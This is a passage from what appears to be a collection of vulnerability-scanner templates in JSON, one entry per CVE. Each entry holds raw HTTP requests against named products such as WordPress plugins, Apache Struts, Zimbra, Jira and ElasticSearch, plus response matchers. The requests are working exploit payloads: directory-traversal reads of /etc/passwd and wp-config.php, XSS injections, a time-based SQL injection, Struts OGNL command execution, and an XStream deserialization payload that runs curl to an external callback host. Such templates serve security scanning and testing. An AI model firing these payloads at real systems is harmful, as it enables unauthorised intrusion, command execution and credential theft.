{{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","_jorani"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCode 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root=.*:0:0"]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File 